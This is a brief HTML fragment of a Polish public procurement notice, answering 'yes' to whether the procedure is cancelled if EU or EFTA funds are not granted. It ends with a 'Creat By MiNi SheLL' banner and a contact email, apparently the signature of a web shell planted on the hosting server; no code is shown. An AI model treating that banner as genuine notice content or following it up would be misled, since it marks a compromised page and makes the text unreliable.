<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com